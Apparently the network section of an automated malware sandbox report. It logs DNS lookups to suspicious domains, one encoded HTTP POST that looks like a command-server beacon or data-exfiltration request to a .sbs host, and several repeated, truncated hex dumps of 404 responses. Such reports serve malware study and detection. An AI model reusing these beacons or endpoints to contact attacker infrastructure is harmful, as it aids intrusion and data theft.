                Source: global trafficDNS traffic detected: DNS query: www.hayaniya.org
                Source: global trafficDNS traffic detected: DNS query: www.lovel.shop
                Source: global trafficDNS traffic detected: DNS query: www.duskgazes.work
                Source: global trafficDNS traffic detected: DNS query: www.zrinorem-srumimit.sbs
                Source: unknownHTTP traffic detected: POST /30le/ HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: closeContent-Length: 220Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nieuws-july202488.sbsReferer: http://www.nieuws-july202488.sbs/30le/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 64 67 6a 39 6c 69 43 31 5a 52 56 6c 4c 7a 6c 45 67 47 63 69 4a 5a 51 59 31 35 35 35 76 49 4c 78 56 58 31 61 4f 7a 70 72 39 50 52 6f 55 4b 53 6b 67 3d 3d Data Ascii: MHJ0GXi=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSdgj9liC1ZRVlLzlEgGciJZQY1555vILxVX1aOzpr9PRoUKSkg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:16:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 03:17:00 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 03:17:03 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 03:17:05 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 44 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 03:17:08 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:17:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:17:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 